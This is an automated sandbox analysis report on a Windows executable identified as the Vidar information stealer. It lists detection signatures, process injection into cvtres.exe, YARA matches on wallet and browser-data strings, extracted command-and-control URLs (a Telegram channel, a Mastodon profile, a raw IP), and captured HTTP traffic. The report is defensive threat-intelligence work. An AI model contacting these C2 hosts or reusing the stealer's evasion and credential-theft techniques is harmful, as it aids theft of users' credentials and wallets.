Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uGfpJynSWM

Overview

General Information

Sample Name:uGfpJynSWM (renamed file extension from none to exe)
Analysis ID:679146
MD5:eb84aeef20ea974bf207dd6df8446567
SHA1:624a1e8510a1d7f3ff05693c30d724f19aaf5a1a
SHA256:9f532c8749bc71b3fc723d42f86300ae5a583515817da2aad40c858f163d01f8
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for URL or domain
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • uGfpJynSWM.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\uGfpJynSWM.exe" MD5: EB84AEEF20EA974BF207DD6DF8446567)
    • cvtres.exe (PID: 6392 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://t.me/korstonsales", "https://climatejustice.social/@ffoleg94"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Vidar_114258d5unknownunknown
    • 0xcae6:$a2: *wallet*.dat
    • 0xcd09:$b1: CC\%s_%s.txt
    • 0xcd51:$b2: History\%s_%s.txt
    • 0xcd39:$b3: Autofill\%s_%s.txt
    00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Vidar_114258d5unknownunknown
      • 0x3ee76:$a2: *wallet*.dat
      • 0x3f099:$b1: CC\%s_%s.txt
      • 0x3f0e1:$b2: History\%s_%s.txt
      • 0x3f0c9:$b3: Autofill\%s_%s.txt
      00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.uGfpJynSWM.exe.3be5530.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0.2.uGfpJynSWM.exe.3be5530.2.unpackWindows_Trojan_Vidar_114258d5unknownunknown
          • 0x3d676:$a2: *wallet*.dat
          • 0x3d899:$b1: CC\%s_%s.txt
          • 0x3d8e1:$b2: History\%s_%s.txt
          • 0x3d8c9:$b3: Autofill\%s_%s.txt
          1.0.cvtres.exe.400000.3.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            1.0.cvtres.exe.400000.3.raw.unpackWindows_Trojan_Vidar_114258d5unknownunknown
            • 0x3ee76:$a2: *wallet*.dat
            • 0x3f099:$b1: CC\%s_%s.txt
            • 0x3f0e1:$b2: History\%s_%s.txt
            • 0x3f0c9:$b3: Autofill\%s_%s.txt
            1.0.cvtres.exe.400000.4.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 23 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: uGfpJynSWM.exeVirustotal: Detection: 67%Perma Link
              Source: uGfpJynSWM.exeMetadefender: Detection: 31%Perma Link
              Source: uGfpJynSWM.exeReversingLabs: Detection: 80%
              Antivirus detection for URL or domain
              Source: http://45.159.249.4/1474h.dllAvira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474stem32Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474NAvira URL Cloud: Label: malware
              Source: http://45.159.249.4/=:Avira URL Cloud: Label: malware
              Source: https://climatejustice.social/@ffoleg94Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/147474RAvira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474bAvira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474lAvira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474uAvira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474xAvira URL Cloud: Label: malware
              Source: http://45.159.249.4:80Avira URL Cloud: Label: malware
              Machine Learning detection for sample
              Source: uGfpJynSWM.exeJoe Sandbox ML: detected
              Source: 1.0.cvtres.exe.400000.0.unpackAvira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.3.unpackAvira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.4.unpackAvira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.2.unpackAvira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.1.unpackAvira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.5.unpackAvira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": ["https://t.me/korstonsales", "https://climatejustice.social/@ffoleg94"]}
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040B7EC lstrcatA,lstrcatA,lstrcatA,CloseHandle,Sleep,OpenEventA,CreateEventA,lstrcatA,lstrcatA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,CloseHandle,1_2_0040B7EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E80D _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,1_2_0040E80D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E3F0 _memset,lstrlen,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,1_2_0040E3F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E575 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_0040E575
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E5CE CryptUnprotectData,LocalAlloc,_memmove,LocalFree,1_2_0040E5CE
              Source: uGfpJynSWM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 167.86.107.75:443 -> 192.168.2.7:49766 version: TLS 1.2
              Source: uGfpJynSWM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdb source: uGfpJynSWM.exe
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdbh) source: uGfpJynSWM.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041208D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,1_2_0041208D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040C955 lstrcatA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_0040C955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411117 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00411117
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004101E9 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_sprintf,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004101E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004162AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,1_2_004162AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00408B15 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlen,1_2_00408B15
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041048F wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0041048F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040954D wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,FindNextFileA,FindClose,1_2_0040954D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411DA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411DA6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00409ADF lstrcatA,lstrcatA,lstrcatA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_00409ADF
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BE430
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BE800
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BD728
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BD71E

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://t.me/korstonsales
              Source: Malware configuration extractorURLs: https://climatejustice.social/@ffoleg94
              Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.me
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.social
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=IE12lf0Aiww%2FO2SHgNYf6X8ktxvGiUwFuvpakzTKg55PVj3wQxbOx8QbPNu%2BbA1ljKtplQtfpHSjetQM3MX253iMB2kbLm3xNEhgwBeB%2F1eCW8Wg13ePrm5lWBQfL9FAO02eO7J9l3dW3s6HTqeP4cis2esq7DldbRI0JLHXWe51XjtZNzvE6RX%2BUXAkx0ez6ASRzCFL8XG1b53DHaPoYf9LXuHN45UIQQKGgtGvY8K1mMZsTqoEdXlHxIHPmSknkSeuS38vHUAtiNgsrwJoiv1FJ7nyRHySt6rMdHZwhHdc3ptf6PDZ0wBxvwMpVHuFlqdHAXbX%2FUb%2Bmlizb1luBXM%3D--UaPP34RL8MYYb6Tj--nidR%2BdAjAGmnnhmujvS6WQ%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=3rSSEQhY%2BR%2ByBXGg%2FZ7vjc6lT5LBYSBRTm4v10Vjq3ue%2BjwBExu9w58N8ClT%2Bud5pLw%2FhNpc0ZVmhbGFmRwVbdBlbgslSN94eAItWDOu4CGgiK9jhd3mHMacn3wAdie7Kxd1jN1PXBqcxNNL004FuuBE8ZcXHZ9KeIX6GtzzFfvUtnGWm8ZnLLwl53QYxoy96Xw8%2BDQyXocErXsPhQdIg%2FpxcTsHw5r3GkFxULvXrHFqPB166JKLVDREPTkxqTmFOYedLa6uPEB2T4kW8V44pB5aEoVFQGo6vkNDPnAvIGvofiJ%2FGZzi5%2FYGT7rR2OuS9SAL1tKkIZTobYnVx%2Fquwbo%3D--ciXPLxNa31c7%2FJvd--PL1p0wGZ8YwXdexsQfoBoQ%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=cBV6gswXNvy8Hgb%2BvExlczZjstftQa27zJ%2ByonVRi5vw9q44kYaXOHqqk%2FMhqSyxc2K1n3IXUv4kERfPbDEZOwE6NFx%2BLntMjgu1MWeXu90ji40Xeo7Tz0u9MgjPeSND%2BppXUEiqV%2Bou0NkQvBHoflX27u%2BLD6qQzJ6oEhtEEA7VVKadgTfzBP2a0zRCmF4SsemcSDzT8BNNzs1M%2BIr4CTeavXuTu%2BJCm0uuMkUySIWpjXI2ILBRTS6oqhKWITt4DN8y09XOU2uhmLZARu%2BXQUXiFg8MhEuyus2jpZ3LM2BaLgmhu4lCR67q728X8Wn%2Bl%2FdyVOgV5qfUpjC%2F2Xeeaxs%3D--9MBRf%2FPU0zFwfS96--LxGMiLJEI8rWcXno6EKaag%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=odijTynxlktrze7IgYOSVyYGax6MLuq%2BHgXXNKVkWj0EmP%2BY%2BYajeG%2F8FkitzpankLQzKOs7zUEdBhjbxOzpdZ1RpsOQGZ1AUSKbXvelp9WMXNXnJ654jBiZtol1X4q0pNgUdviAwoWtj%2FRytZuF3icv9tA2rrhSHuj8RNt7upfkwzVVGdrp1OipqNMvxNGxOGsFr55qZoPRd7OunaK4YDlwg%2Bc1dFbtqJ%2FwmLTyaTlwPgipiHfY3D96mosQe3LYewtprF6rsACbNZQUOPaPNuvOAKe1MffUWL9jfeHvRGne%2Frrk4sQKfhRHzSDToiAhNgEMrluTU%2FqXba1%2FBYcmyoU%3D--bxICJGAgGqamQv1Z--NCklHYqUpYEpY8rfNxpO7g%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=G8wdgwz%2FDemSpy0Da1ZLqVdSh5XC%2FhOntkD9%2FioEKONmGFQbKw3ZbiJ4RIMQvyl5QKxN%2FpcDH0nKadQ0yXDwXyz6yqDcLvbVjYrc1VwLIggpvLXohspOLTi9YyRFkDXD1U6%2Fzrzrb4LoA5rAsIFcowDfc23g9dzpYcSLczI6VlHA0lfP8JjHOwarQxEdzM6akhIz0PxsXrVBHQQArBfIyixEHqMzgVy%2FgvPIRcQ2qdVLKMgTPmDwVbQ0%2BqoNguC6M%2F7xjoKMMQknPlrQIslHVR5u8qBY9lIeeNK373jl%2B82kCofXgGW%2BvK4Vwx2GKefGraC9M1B%2Bz7G9H6WpaKFziTw%3D--Ffkg6BiJ3LNw7A7D--YyCOAf66iro8NmL254gNlw%3D%3D
              Source: Joe Sandbox ViewIP Address: 167.86.107.75 167.86.107.75
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594536976.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/147474R
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474N
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474b
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474h.dll
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474l
              Source: cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474stem32
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474u
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/1474x
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4/=:
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.159.249.4:80
              Source: uGfpJynSWM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: uGfpJynSWM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: uGfpJynSWM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: uGfpJynSWM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: uGfpJynSWM.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340494604.0000000004D0E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341146688.0000000004D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: uGfpJynSWM.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: uGfpJynSWM.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: uGfpJynSWM.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: uGfpJynSWM.exeString found in binary or memory: http://ocsp.digicert.com0N
              Source: uGfpJynSWM.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.global
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.rocks
              Source: cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/
              Source: cvtres.exe, 00000001.00000003.526458800.0000000004D54000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594549794.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341127759.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572585218.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594578967.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341146688.0000000004D09000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/avatars/original/missing.png
